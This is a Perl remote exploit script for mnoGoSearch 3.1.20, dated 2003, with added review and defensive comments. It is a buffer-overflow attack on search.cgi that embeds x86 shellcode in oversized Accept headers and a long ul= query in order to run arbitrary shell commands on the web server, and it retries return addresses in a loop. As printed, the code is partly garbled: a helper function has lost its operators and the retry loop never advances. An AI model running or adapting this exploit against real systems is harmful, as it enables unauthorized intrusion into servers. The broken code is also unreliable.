
mnoGoSearch 3.1.20 Remote Command Execution Exploit


http://www.gipsky.com/
#!/usr/bin/perl

#

# [ reloaded ]

# Remote Exploit for mnoGoSearch 3.1.20 that performs

# remote command execution as the webserver user id

# for linux ix86

# by pokleyzz

#



use IO::Socket;



# Script-wide defaults. Each of these package globals may be overridden by a
# positional command-line argument in the block that follows (see the usage
# text printed when no host is given).
$host = "127.0.0.1";

$cmd = "ls -la";

$searchpath = "/cgi-bin/search.cgi";

# Starting value for the return-address loop at the bottom of the script;
# int_to_hex()/string_to_ret() turn it into the bytes that are sent.
$rawret = 0xbfff105c;

$ret = "";

# Extra leading padding bytes ("suff") prepended to the query buffer.
$suffsize = 0;

$port = 80;



# Socket handle shared by connect_to(), check_version() and exploit().
my $conn;





# Positional argument handling: host [command] [path] [port] [suff] [ret].
# Every argument is tested for truthiness, so a literal "0" (e.g. as port or
# suff) is silently ignored and the default stays in effect.
if ($ARGV[0]){

$host = $ARGV[0];

}

else {

print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";

print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";

print "\thost\thostname to exploit\n";

print "\tcommand\tcommand to execute on server\n";

print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";

print "\tport\tport to connect to\n";

print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";

# NOTE(review): the default quoted here (bfffd0d0) does not match the initial
# value assigned to $rawret above (0xbfff105c); the code value is the one used.
print "\tret\treturn address default bfffd0d0\n";

exit;

}



if ($ARGV[1]){

$cmd = $ARGV[1];

}

if ($ARGV[2]){

$searchpath = $ARGV[2];

}

if ($ARGV[3]){

$port = int($ARGV[3]);

}

if ($ARGV[4]){

$suffsize = int($ARGV[4]);

}

# hex_to_int() is defined further down; Perl resolves the call at run time,
# which is fine because this statement runs after the whole file is compiled.
if ($ARGV[5]){

$rawret = hex_to_int($ARGV[5]);

}



#########~~ start function ~~#########

# Convert an 8-hex-digit string (as typed on the command line) into an
# integer by combining four shifted byte values.  There is no explicit
# return; the value of the last expression is what the caller receives.
#
# NOTE(review): as printed this body does not parse — the operators that
# should join the four shifted terms are absent, most likely lost when the
# listing was transcribed to the web page.  Treat this function as
# illustrative of intent only.
sub hex_to_int {

my $hs = $_[0];

$int = (hex(substr($hs, 0, 2)) << 24) (hex(substr($hs, 2, 2)) << 16)

(hex(substr($hs, 4, 2)) << 8) hex(substr($hs, 6, 2));



}



sub int_to_hex {

    # Render an integer as lowercase hexadecimal with no "0x" prefix and no
    # zero padding.  As in the original, the string is also left in the
    # package global $hex as a side effect before being returned.
    my ($value) = @_;

    $hex = sprintf('%x', $value);

    return $hex;

}



sub string_to_ret {

    # Pack an 8-hex-digit string into four raw bytes.  The bytes are emitted
    # in input order 1,0,3,2 (each adjacent pair swapped).  When the input is
    # not exactly 8 characters the string is echoed and the script dies.
    # The result is stored in the package global $ret and also returned.
    my ($hex_str) = @_;

    if (length($hex_str) != 8) {

        print $hex_str;

        die "[*] incorrect return address ...\n ";

    }

    my @packed = map { chr(hex(substr($hex_str, $_, 2))) } (2, 0, 6, 4);

    $ret = join '', @packed;

    return $ret;

}



# Open a TCP connection to the global $host:$port and store the handle in the
# shared $conn.  Dies with a short message when the connection cannot be
# established.  autoflush(1) makes each print go out immediately so the
# request is not held in a buffer while the server's reply is awaited.
sub connect_to {

#print "[x] Connect to $host on port $port ...\n";

$conn = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "[*] Can't connect to $host on port $port ...\n";

$conn-> autoflush(1);

}



# Fingerprint the target before anything else is sent.  A single GET with
# tmplt=/test/testing123 is issued and the whole reply is slurped; if the
# body contains "_test_" the script continues, otherwise it prints the reply
# and dies.  Note that $result here is a lexical and is unrelated to the
# global $result filled in by exploit().
#
# Defensive note: this probe is a usable detection signature — a request to
# search.cgi carrying a tmplt= value that points at a non-existent template
# path is not something a normal client sends.
sub check_version {

my $result;

connect_to();

print "[x] Check if $host use correct version ...\n";

print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";



# capture result

# Reads until the server closes the socket (hence "Connection: Close").
while ($line = <$conn>) {

$result .= $line;

};



close $conn;

if ($result =~ /_test_/){

print "[x] Correct version detected .. possibly vulnerable ...\n";

} else {

print $result;

die "[x] New version or wrong url\n";

}

}



# Build and send one attempt for the return address $rw (an integer).  The
# server's full reply is accumulated into the global $result, which
# check_result() inspects afterwards.
#
# Defensive note: the request produced here is extremely atypical — a GET to
# search.cgi whose ul= value is over 5 KB of padding, plus three Accept*
# headers of exactly 4096 bytes each.  Front-end limits on header and query
# length, or a WAF rule on those sizes, block it outright; the actual fix is
# to run a mnoGoSearch release that is not affected by this overflow.
sub exploit {

my $rw = $_[0];

$result = "";

# linux ix86 shellcode rip from phx.c by proton

# The trailing text of the payload is a /bin/sh command line.  It prints the
# marker header "Content-Type: text/hello" first so that check_result() can
# tell a successful run apart from the CGI's normal text/html reply.  $cmd
# (from the command line) is interpolated verbatim.
$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"

."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"

."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

."\x41\x41"

."/bin/sh -c echo 'Content-Type: text/hello';echo '';"

."$cmd"

."@";

# Integer -> 8 hex digits -> 4 raw bytes (see int_to_hex / string_to_ret).
$strret = int_to_hex($rw);

$ret = string_to_ret($strret);

# Pad with 'B' so that padding + shellcode is exactly 4096 bytes; this same
# string is then placed in three request headers.
$envvar = 'B' x (4096 - length($shellcode));

$envvar .= $shellcode;



# generate query string

# $suffsize leading bytes, then 4800 bytes of 'B', then 200 copies of the
# 4-byte $ret (800 bytes).
$buffer = "B" x $suffsize;

$buffer .= "B" x 4800;

$buffer .= $ret x 200;



$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"

."Accept: $envvar\n"

."Accept-Language: $envvar\n"

."Accept-Encoding: $envvar\n"

."User-Agent: Mozilla/4.0\n"

."Host: $host\n"

."Connection: Close\n\n";



# Style: the &name; call form passes this sub's @_ through to connect_to();
# harmless here because connect_to() ignores its arguments.
&connect_to;

print "[x] Sending exploit code ..\n";

print "[x] ret: $strret\n";

print "[x] suf: $suffsize\n";

print "[x] length:",length($request),"\n";

print $conn "$request";

# Slurp the reply until the server closes the connection.
while ($line = <$conn>) {

$result .= $line;

};

close $conn;



}



# Decide whether the last attempt worked, based solely on the global $result
# left behind by exploit().  Success means the marker "hello" is present and
# the reply does not carry the CGI's usual "text/html" type; in both cases the
# reply is printed, and the global $success is set to 1 or 0 for the caller.
sub check_result {

if ($result =~ /hello/ && !($result =~ /text\/html/)){

print $result;

$success = 1;

} else {

print $result;

print "[*] Failed ...\n";

$success = 0;

}

}

#########~~ end function ~~#########



# Main flow: fingerprint first, then retry exploit() with successive values
# of $rawret until check_result() reports success, pausing one second
# between attempts.
#
# NOTE(review): as printed, the loop's update clause assigns a constant to
# $rawret instead of advancing it, so the termination test is never reached;
# together with the damaged hex_to_int() body this suggests the listing was
# altered in transcription.  The bare "$rawret" init expression is a no-op.
&check_version;

for ($rawret; $rawret < 0xbfffffff;$rawret = 1024){

&exploit($rawret);

&check_result;

if ($success == 1){

exit;

}

sleep 1;

}

[2003-06-10]